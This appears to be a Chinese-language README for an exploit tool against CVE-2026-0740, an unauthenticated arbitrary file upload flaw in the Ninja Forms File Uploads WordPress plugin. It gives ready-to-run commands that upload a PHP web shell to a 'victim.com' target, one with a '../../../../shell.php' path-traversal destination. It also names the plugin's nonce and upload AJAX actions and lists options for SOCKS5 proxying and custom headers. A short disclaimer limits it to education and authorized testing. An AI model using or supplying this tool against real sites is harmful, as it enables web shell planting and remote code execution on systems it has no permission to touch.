CVE-2026-0740 是一个未经过身份验证的任意文件上传漏洞,影响:
Ninja Forms File Uploads ≤ 3.3.26 (WordPress 插件)
此漏洞允许攻击者无需身份验证即可向服务器上传任意文件,可能导致远程代码执行(RCE)。
本项目仅供教育和授权的安全测试目的使用。
安装依赖:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php 请求一个 nonce/wp-admin/admin-ajax.phpnf_fu_get_new_noncenf_fu_upload/wp-content/uploads/ 目录本项目采用 MIT 许可证授权 — 详情请参阅 LICENSE 文件。
欢迎提交拉取请求。若进行重大更改,请先开启一个 issue 讨论您想要更改的内容。
| Argument | Description |
|---|
-t, --target | 目标 URL |
-f, --file | 要上传的文件 |
-d, --dest | 目标路径(路径遍历) |
-x, --proxy | SOCKS5 代理 |
-H, --headers | 自定义头部 |
--timeout | 请求超时时间 |
--no-color | 禁用彩色输出 |
-q, --quiet | 安静模式 |
--verify-ssl | 启用 SSL 验证 |